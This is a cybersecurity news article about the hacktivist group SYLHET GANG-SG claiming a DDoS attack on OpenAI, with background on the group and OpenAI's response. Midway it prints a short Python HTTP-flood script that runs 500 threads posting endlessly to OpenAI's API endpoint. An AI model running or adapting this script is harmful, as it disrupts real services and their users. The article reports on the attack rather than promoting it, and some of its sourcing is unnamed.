In an escalation of hacktivist operations against AI technology providers, the notorious hacktivist group SYLHET GANG-SG has claimed responsibility for a massive distributed denial-of-service (DDoS) attack targeting OpenAI’s infrastructure.
The attack, which temporarily disrupted access to ChatGPT and other OpenAI services, comes amidst growing concerns about AI ethics and follows recent reports of a separate security breach affecting the company.
Technical Analysis of the Attack
According to the post from DarkWebInformer, Security researchers analyzing the attack pattern identified a volumetric DDoS assault involving a botnet of compromised IoT devices.
The attackers deployed a sophisticated multi-vector approach, combining HTTP flooding, TCP SYN floods, and DNS amplification techniques to overwhelm OpenAI’s servers.
A cybersecurity expert who examined the attack shared this simplified version of the script allegedly used by the attackers:
import requests
import threading
import random
import time
# Target configuration
target_url = "https://api.openai.com/v1/chat/completions"
user_agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)"
]
def launch_request():
headers = {
'User-Agent': random.choice(user_agents),
'Content-Type': 'application/json'
}
while True:
try:
response = requests.post(target_url, headers=headers)
print(f"Attack sent, status code: {response.status_code}")
except:
pass
time.sleep(0.01)
# Launch multiple threads
for i in range(500):
threading.Thread(target=launch_request).start()Background on SYLHET GANG-SG
SYLHET GANG-SG is a hacktivist group that previously targeted critical infrastructure and various entities, including the Central European University and the EU Parliament.
In early 2024, the group declared allegiance to the notorious KillNet 2.0 hacker collective, signaling an escalation in their cyber operations.
The group is primarily known for DDoS attacks against Western targets and has claimed responsibility for previous attacks on financial institutions, including Indian banks like City Union Bank and Dakshin Bihar Gramin Bank.
Security researchers describe it as a “pro-Palestine, anti-India, Bengali-speaking hacktivist group active since 2023”.
Connection to Recent OpenAI Breach Claims
This attack follows unconfirmed reports that an anonymous threat actor claimed to have stolen the login credentials of 20 million OpenAI users and offered them for sale on the dark web.
While OpenAI has not confirmed any connection between these incidents, cybersecurity experts suggest the timing may not be coincidental.
“This coordinated action against OpenAI represents a concerning evolution in hacktivist tactics, specifically targeting AI infrastructure,” noted a senior threat analyst at a leading cybersecurity firm.
OpenAI’s spokesperson stated: “We’re aware of the DDoS attempt against our systems and have implemented mitigation measures.
Our security team is investigating the incident, and we’re working to ensure service stability for our users.”
Users are advised to change their OpenAI account passwords and enable multi-factor authentication as a precautionary measure while the investigation continues.
Also Read:
%20(1)%20(1).webp?w=1200&resize=1200,0&ssl=1&description=The attack, which temporarily disrupted access to ChatGPT and other OpenAI services, comes amidst growing concerns about AI ethics.){kind=link}